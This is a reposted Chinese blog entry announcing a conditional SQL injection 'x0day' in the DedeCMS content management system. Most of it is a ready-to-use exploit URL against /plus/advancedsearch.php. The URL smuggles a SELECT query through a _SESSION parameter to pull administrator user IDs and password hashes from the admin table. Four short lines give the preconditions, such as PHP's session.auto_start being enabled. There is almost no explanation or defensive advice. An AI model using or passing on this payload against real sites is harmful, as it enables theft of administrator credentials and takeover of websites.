首页 > 数据库技术 > 详细

dedecms有条件sql注入(x0day)

时间:2016-08-30 00:20:19      阅读:626      评论:0      收藏:0      [点我收藏+]

https://www.t00ls.net/thread-35569-1-1.html

 

http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%23@__admin` aaa &sqlhash=123

条件利用:

1.漏洞代码在/plus/advancedsearch.php 文件中
2.是一个sql注入的漏洞
3.php要开启session.auto_start = 1
4.漏洞存在和session有关

dedecms有条件sql注入(x0day)

原文:http://www.cnblogs.com/hookjoy/p/5820218.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!